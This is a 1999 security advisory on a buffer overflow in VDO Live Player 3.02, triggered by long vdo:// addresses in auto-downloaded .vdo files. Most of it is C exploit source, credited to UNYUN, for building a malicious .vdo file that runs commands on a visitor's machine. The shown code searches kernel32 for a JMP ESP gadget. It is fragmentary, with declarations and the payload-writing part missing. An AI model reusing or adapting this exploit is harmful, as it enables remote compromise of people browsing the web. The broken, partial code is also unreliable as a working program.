VDO Live Player 3.02 contains an exploitable buffer overflow (vdo://)
13 Dec. 1999
Summary
VDO Live Player overflows when it reads a '.vdo' file that contains a long vdo address. If VDO Live Player is installed on the system and the default setting of browser are used, '.vdo' files are downloaded and executed without any confirmation.
Therefore, if a clients visits a web page which uses automatic download of '.vdo' files (for example, by a META REFRESH tag) and that vdo file contains an attack code, the client machine will be compromised.
Credit:
The information has been provided by: UNYUN.
The following sample source code generates a '.vdo' file that executes any commands on the visitor's machine:
(This code was tested on Japanese Windows98 only)
-----
/*===============================================================
ex_vdolive.c / VDO Live Player 3.02 32bit exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
================================================================
*/
unsigned int search_mem(unsigned char *st,unsigned char *ed,
unsigned char c1,unsigned char c2)
{
unsigned char *p;
unsigned int adr;
for (p=st;p<ed;p++)
if (*p==c1 && *(p+1)==c2){
adr=(unsigned int)p;
if ((adr&0xff)==0) continue;
if (((adr>>8)&0xff)==0) continue;
if (((adr>>16)&0xff)==0) continue;
if (((adr>>24)&0xff)==0) continue;
return(adr);
}
return(0);
}
if (argc<2){
printf("usage: %s FileName Command\n",argv[0]);
exit(1);
}
if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){
printf("Can not find %s\n",KERNEL_NAME);
exit(1);
}
VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
for (i=0;i<meminfo.RegionSize;i++){
ip=kp+i;
if ( ( ip &0xff)==0
|| ((ip>>8 )&0xff)==0
|| ((ip>>16)&0xff)==0
|| ((ip>>24)&0xff)==0) continue;
q=(unsigned char *)ip;
if (*q==JMPESP_1 && *(q+1)==JMPESP_2) break;
}
if (i==meminfo.RegionSize){
printf("Can not find codes which are used by this exploit.\n");
exit(1);
}
